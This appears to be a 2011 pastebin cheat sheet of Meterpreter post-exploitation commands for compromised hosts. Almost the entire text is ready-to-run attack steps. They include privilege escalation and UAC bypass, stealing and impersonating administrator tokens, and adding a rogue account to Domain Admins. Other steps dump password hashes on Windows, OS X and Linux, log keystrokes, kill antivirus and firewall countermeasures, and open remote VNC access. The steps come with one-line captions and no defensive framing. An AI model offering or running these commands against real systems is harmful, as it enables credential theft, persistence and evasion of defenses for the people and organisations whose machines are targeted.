Meterpreter Post Exploitation Commands

a guest
Aug 14th, 2011
Elevate your permissions on Windows-based systems using Meterpreter:
meterpreter > use priv
meterpreter > getsystem

Steal a domain administrator token from a given process ID, add a domain account, and then add it to the Domain Admins group:
meterpreter > ps
meterpreter > steal_token 1784
meterpreter > shell
C:\Windows\system32>net user metasploit p@55w0rd /ADD /DOMAIN
C:\Windows\system32>net group "Domain Admins" metasploit /ADD /DOMAIN

Dump password hashes from the SAM database:
meterpreter > use priv
meterpreter > getsystem
meterpreter > hashdump
NOTE: On Win2k8 you may need to migrate to a process that is running as SYSTEM if getsystem and hashdump throw exceptions.

Automigrate to a separate process:
meterpreter > run migrate

Kill antivirus processes running on the target via the killav Meterpreter script:
meterpreter > run killav

Capture keystrokes on target machines from within a particular process:
meterpreter > ps
meterpreter > migrate 1436
meterpreter > keyscan_start
meterpreter > keyscan_dump
meterpreter > keyscan_stop

Use Incognito to impersonate an administrator:
meterpreter > use incognito
meterpreter > list_tokens -u
meterpreter > use priv
meterpreter > getsystem
meterpreter > list_tokens -u
meterpreter > impersonate_token IHAZSECURITY\\Administrator

See what protection mechanisms are in place on the compromised target, display the help menu, disable Windows Firewall, and kill all countermeasures found:
meterpreter > run getcountermeasure
meterpreter > run getcountermeasure -h
meterpreter > run getcountermeasure -d -k

Identify whether the compromised system is a virtual machine:
meterpreter > run checkvm

Drop into a command shell for a current Meterpreter console session:
meterpreter > shell

Get a remote GUI (VNC) on the target machine:
meterpreter > run vnc

Background a currently running Meterpreter console:
meterpreter > background

Bypass Windows User Account Control:
meterpreter > run post/windows/escalate/bypassuac

Dump hashes on an OS X system:
meterpreter > run post/osx/gather/hashdump

Dump hashes on a Linux system:
meterpreter > run post/linux/gather/hashdump